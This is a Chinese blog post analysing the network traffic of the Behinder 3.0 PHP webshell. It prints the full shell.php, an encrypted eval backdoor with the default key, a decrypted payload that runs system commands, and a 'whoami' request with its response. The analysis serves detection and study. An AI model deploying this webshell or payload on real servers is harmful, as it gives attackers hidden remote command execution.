behinder3.0流量分析(PHP)

webshell 流量分析
创建时间:
阅读:
  1. 流量解密

冰蝎为一款主流Webshell管理工具,本篇分析Benhinder3.0中php shell流量。

Github:https://github.com/rebeyond/Behinder/releases/download/Behinder_v3.0_Beta_11/Behinder_v3.0_Beta_11.t00ls.zip

测试环境:

1
2
3
Win7
PhpStudy
Behinder3.0

为了方便测试,php需开启openssl插件。

Behinder内置Webshell,在server目录下

shell.php内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

和Behinder2.0相比,可以发现加密方式并没有改变,若开启了openssl,则会采用AES128->base64进行解密,若未开启openssl,则会使用base64->异或进行解密。

将/server/shell.php放置在phpstudy网站目录中,使用Behinder3.0进行连接,默认密码为rebeyond

成功连接

流量解密

这里为了直观我将流量代理至burp进行分析,打开webshell之后,bp一共抓到了两个数据包第一个数据包是用来判断连通性,第二个数据包收集了一些系统的基本信息,同Behinder2.0相比,3.0取消了两次获取秘钥的操作,直接将秘钥规定成了md5(“pass”)[0:16]。

AES解密:http://tools.bugscaner.com/cryptoaes/
Base64解密:https://tool.oschina.net/encrypt?type=3

这里在Behinder中通过cmd查询当前用户

POST数据如下:

1
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

解密后得到php代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
@error_reporting(0);

function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
function main($cmd,$path)
{
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time', 0);
    $result = array();
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
        $PadtJn = explode(',', $PadtJn);
        $PadtJn = array_map('trim', $PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1\n";
    }
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
        $handle = proc_open($c, array(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
        $kWJW = array();
        exec($c, $kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
        $fp = popen($c, 'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp, 1024);
            }
        }
        @pclose($fp);
    } else {
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result), $key);
        return;
        
    }
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode(getSafeStr($kWJW));
    echo encrypt(json_encode($result),  $_SESSION['k']);
}

function encrypt($data,$key)
{
	if(!extension_loaded('openssl'))
    	{
    		for($i=0;$i<strlen($data);$i++) {
    			 $data[$i] = $data[$i]^$key[$i+1&15]; 
    			}
			return $data;
    	}
    else
    	{
    		return openssl_encrypt($data, "AES128", $key);
    	}
}$cmd="Y2QgL2QgIkM6XHBocFN0dWR5XFBIUFR1dG9yaWFsXFdXV1wiJndob2FtaQ==";$cmd=base64_decode($cmd);$path="QzovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXLw==";$path=base64_decode($path);
main($cmd,$path);

其中cmdbase64再次解密后为:

1
cd /d "C:\phpStudy\PHPTutorial\WWW\"&whoami

可以看见执行了我们想要的系统命令,再来看返回包的内容

1
2
3
4
5
6
原始返回数据:
mAUYLzmqn5QPDkyI5lvSp0fjiBu1e7047YjfczwY6j6s/lQ/FSv4i/f1oXtFnU8jMC7rtIEWFK+lwkXIolWSPw==
AES解密后数据:
{"status":"c3VjY2Vzcw==","msg":"c3dhZzctcGNcc3dhZzcNCg=="}
base64解密后的msg:
swag7-pc\swag7

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:behinder3.0流量分析(PHP)

本文作者:sher10ck

发布时间:2021-06-23, 15:27:30

最后更新:2021-06-23, 16:50:50

原始链接:http://sherlocz.github.io/2021/06/23/behinder3-analysis-php/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

©2019-2020 sher10ck

Built with Hexo and 3-hexo theme

目录